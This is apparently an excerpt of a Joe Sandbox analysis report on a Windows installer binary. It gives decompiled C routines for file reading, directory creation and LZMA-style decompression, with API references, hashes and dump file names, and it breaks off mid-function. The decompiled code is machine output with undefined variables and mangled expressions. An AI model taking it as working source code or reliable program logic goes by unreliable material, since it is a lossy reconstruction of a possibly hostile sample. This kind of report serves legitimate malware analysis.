                                                    control_flow_graph 713 403371-40337e 714 403380-403396 SetFilePointer 713->714 715 40339c-4033a5 call 403479 713->715 714->715 718 403473-403476 715->718 719 4033ab-4033be call 4061db 715->719 722 403463 719->722 723 4033c4-4033d7 call 403479 719->723 725 403465-403466 722->725 727 403471 723->727 728 4033dd-4033e0 723->728 725->718 727->718 729 4033e2-4033e5 728->729 730 40343f-403445 728->730 729->727 733 4033eb 729->733 731 403447 730->731 732 40344a-403461 ReadFile 730->732 731->732 732->722 734 403468-40346b 732->734 735 4033f0-4033fa 733->735 734->727 736 403401-403413 call 4061db 735->736 737 4033fc 735->737 736->722 740 403415-40341c call 40620a 736->740 737->736 742 403421-403423 740->742 743 403425-403437 742->743 744 40343b-40343d 742->744 743->735 745 403439 743->745 744->725 745->727
                                                    C-Code - Quality: 92%
                                                    			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}















                                                    0x00403375
                                                    0x0040337e
                                                    0x00403387
                                                    0x0040338b
                                                    0x00403396
                                                    0x00403396
                                                    0x0040339e
                                                    0x004033a5
                                                    0x004033b7
                                                    0x004033be
                                                    0x00403463
                                                    0x00403463
                                                    0x00000000
                                                    0x004033c4
                                                    0x004033c7
                                                    0x004033d3
                                                    0x004033d7
                                                    0x00403471
                                                    0x00403471
                                                    0x004033dd
                                                    0x004033e0
                                                    0x0040343f
                                                    0x00403445
                                                    0x00403447
                                                    0x00403447
                                                    0x00403459
                                                    0x00403461
                                                    0x00403468
                                                    0x0040346b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004033e2
                                                    0x004033e5
                                                    0x00000000
                                                    0x004033eb
                                                    0x004033f0
                                                    0x004033f7
                                                    0x004033fa
                                                    0x004033fc
                                                    0x004033fc
                                                    0x00403409
                                                    0x0040340c
                                                    0x00403413
                                                    0x00000000
                                                    0x00000000
                                                    0x0040341c
                                                    0x00403423
                                                    0x0040343b
                                                    0x00403465
                                                    0x00403465
                                                    0x00403425
                                                    0x00403425
                                                    0x00403428
                                                    0x0040342b
                                                    0x00403431
                                                    0x00403437
                                                    0x00000000
                                                    0x00403439
                                                    0x00000000
                                                    0x00403439
                                                    0x00403437
                                                    0x00000000
                                                    0x00403423
                                                    0x00000000
                                                    0x004033f0
                                                    0x004033e5
                                                    0x004033e0
                                                    0x004033d7
                                                    0x004033be
                                                    0x00403473
                                                    0x00403476

                                                    APIs
                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID: FreeEnvironmentStringsW
                                                    • API String ID: 973152223-472878650
                                                    • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                    • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                    • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                    • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 746 4015c1-4015d5 call 402da6 call 405fe2 751 401631-401634 746->751 752 4015d7-4015ea call 405f64 746->752 753 401663-4022f6 call 401423 751->753 754 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 751->754 759 401604-401607 call 405c16 752->759 760 4015ec-4015ef 752->760 770 402c2a-402c39 753->770 771 40292e-402935 753->771 754->770 773 40165b-40165e 754->773 769 40160c-40160e 759->769 760->759 763 4015f1-4015f8 call 405c33 760->763 763->759 777 4015fa-4015fd call 405b99 763->777 775 401610-401615 769->775 776 401627-40162f 769->776 771->770 773->770 779 401624 775->779 780 401617-401622 GetFileAttributesW 775->780 776->751 776->752 782 401602 777->782 779->776 780->776 780->779 782->769
                                                    C-Code - Quality: 86%
                                                    			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                    0x004015c1
                                                    0x004015c9
                                                    0x004015cc
                                                    0x004015d1
                                                    0x004015d5
                                                    0x004015d7
                                                    0x004015df
                                                    0x004015e1
                                                    0x004015e4
                                                    0x004015ea
                                                    0x00401604
                                                    0x00401607
                                                    0x004015ec
                                                    0x004015ec
                                                    0x004015ef
                                                    0x00000000
                                                    0x004015fa
                                                    0x004015fd
                                                    0x004015fd
                                                    0x004015ef
                                                    0x0040160e
                                                    0x00401615
                                                    0x00401624
                                                    0x00401624
                                                    0x00401617
                                                    0x0040161a
                                                    0x00401622
                                                    0x00000000
                                                    0x00000000
                                                    0x00401622
                                                    0x00401615
                                                    0x00401627
                                                    0x0040162b
                                                    0x0040162c
                                                    0x004015d7
                                                    0x00401634
                                                    0x00401663
                                                    0x004022f1
                                                    0x00401636
                                                    0x00401638
                                                    0x00401645
                                                    0x0040164d
                                                    0x00401655
                                                    0x0040165b
                                                    0x0040165b
                                                    0x00401655
                                                    0x00402c2d
                                                    0x00402c39

                                                    APIs
                                                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00405FF0
                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                      • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                    • API String ID: 1892508949-1943935188
                                                    • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                    • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                    • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                    • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 53%
                                                    			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                    0x0040604b
                                                    0x00406056
                                                    0x0040605a
                                                    0x00406061
                                                    0x0040606d
                                                    0x0040607d
                                                    0x0040607f
                                                    0x00406097
                                                    0x00406098
                                                    0x0040609f
                                                    0x004060a0
                                                    0x00000000
                                                    0x00000000
                                                    0x00406083
                                                    0x0040608a
                                                    0x00406092
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040608a
                                                    0x004060a2
                                                    0x004060a8
                                                    0x00000000
                                                    0x004060b6
                                                    0x0040606f
                                                    0x00406075
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406075
                                                    0x0040605c
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00405FF0
                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                    • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00406098
                                                    • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560), ref: 004060A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                    • String ID: P_B
                                                    • API String ID: 3248276644-906794629
                                                    • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                    • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                    • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                    • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 99%
                                                    			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
